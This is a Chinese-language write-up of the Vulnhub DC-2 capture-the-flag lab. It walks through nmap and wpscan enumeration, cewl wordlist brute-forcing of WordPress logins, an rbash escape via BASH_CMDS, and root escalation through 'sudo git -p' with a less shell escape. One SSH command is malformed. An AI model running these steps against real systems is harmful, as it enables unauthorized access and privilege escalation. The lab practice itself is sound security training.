Vulnhub-DC:2
环境配置
修改模式改为NAT模式
当前网段为192.168.100.0/24
信息搜集
首先扫描网段
1 | arp-scan -l |
192.168.100.135就是目标靶机。nmap扫描一下
1 | nmap -A 192.168.100.135 |
扫描结果有80端口, Apache httpd 2.4.10 ((Debian)),
1 | Did not follow redirect to http://dc-2/ |
访问ip被重定向到http://dc-2
首先配置host文件,在C:\Windows\System32\drivers\etc\host在文件末尾中添加
1 | 192.168.100.135 DC-2 |
再执行
1 | ipconfig /flushdns |
就可以访问网站。
web指纹信息
1 | whatweb -v 192.168.100.135 |
WordPress 4.7.10 + Apache2.4.10 Debian
漏洞利用
首先访问网站就可以得到flag1
你常用的单词列表可能不管用,所以,或许你需要发挥一下自己的特长。
密码越多越好,但有时候你不可能每次都成功。
用一个账号登录,看看下一个flag。
如果找不到,就用另一个账号登录。
这里说到要登入,但是登入进去前端没有登入接口,dirsearch扫一下
访问一下wp-login.php
找到登入界面,尝试弱口令爆破无果,使用扫描WordPress站点的工具wpscan
1 | wpscan --url 192.168.100.135 -e u |
扫出来了3个用户名,接下来使用cewl生成一个字典
1 | cewl http://dc-2 >payload.txt |
然后开始爆破
1 | wpscan --url http://dc-2 -password payload.txt |
成功爆破出密码,登入jerry/adipiscing
如果你无法利用 WordPress 走捷径,还有另一种方法。
希望你能找到其他切入点。
这里说找其他切入点,刚才nmap扫端口的时候只有这个80端口,这里其实有一个坑,默认扫描的是常见的1000端口,这里全量扫描
1 | nmap -sV 192.168.100.135 -p- |
还有一个7744有ssh服务,用tom账号登入一下
1 | ssh @tom192.168.100.135 -p 7744 |
登入成功读一下flag3.txt
这里受到rbash的限制,使用less命令读文件
可怜的老 Tom 总在追逐 Jerry,或许他可以通过su命令切换用户来解决问题。
这里切换一下用户需要绕过限制
1 | BASH_CMDS[a]=/bin/sh;a |
在jerry家找到了flag4.txt
很高兴看到你走到这一步——但你还没到家呢。
你还需要拿到最后一面旗帜(唯一真正重要的旗帜!!!)。
这里没有任何提示——现在只能靠你自己了。:-)
加油——离开这里!!!!
需要jerry用户git提权到root
这里看到看到可以免密执行git命令
1 | sudo git -p help config |
用 root 权限分页查看 git config 的帮助说明,-p是强制启用分页器less查看文档,运行后会进入到less分页阅读界面,less的一个功能就是输入 !+命令 就能直接调用系统 shell,而且当前整个进程是 root 权限,可以提权
提权成功,得到flag


















